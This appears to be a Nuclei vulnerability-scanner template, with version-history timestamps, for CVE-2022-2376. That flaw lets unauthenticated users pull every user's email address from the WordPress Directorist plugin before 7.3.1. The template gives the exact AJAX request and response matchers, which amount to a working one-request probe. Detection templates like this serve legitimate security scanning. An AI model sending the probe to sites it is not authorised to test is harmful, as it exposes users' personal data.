nuclei-templates/http/cves/2022/CVE-2022-2376.yaml

52 lines
1.7 KiB
YAML
Raw Normal View History

2022-09-06 08:57:31 +00:00
id: CVE-2022-2376
info:
name: WordPress Directorist <7.3.1 - Information Disclosure
2022-09-06 08:57:31 +00:00
author: Random-Robbie
severity: medium
description: WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users.
2023-09-06 11:59:08 +00:00
remediation: Fixed in version 7.3.1.
2022-09-06 08:57:31 +00:00
reference:
- https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2376
- https://nvd.nist.gov/vuln/detail/CVE-2022-2376
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-2376
cwe-id: CWE-862
2023-10-14 11:27:55 +00:00
epss-score: 0.04933
epss-percentile: 0.91903
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: wpwax
product: directorist
2023-09-06 11:59:08 +00:00
framework: wordpress
2023-07-11 19:49:27 +00:00
tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure
2022-09-06 08:57:31 +00:00
http:
2022-09-06 08:57:31 +00:00
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'directorist-authors__card__details__top'
- 'directorist-authors__card__info-list'
2022-09-09 11:02:19 +00:00
condition: and
2022-09-06 08:57:31 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502204aecd13ad04eb3d1f7db0ec33bca81f8276f848dc201806dcc9a17ff189bc274022100e57e0b92cb543a72056e9a3f39f01aace5a6dd1217410b615b24bed10add541b:922c64590222798bb761d5b6d8e72950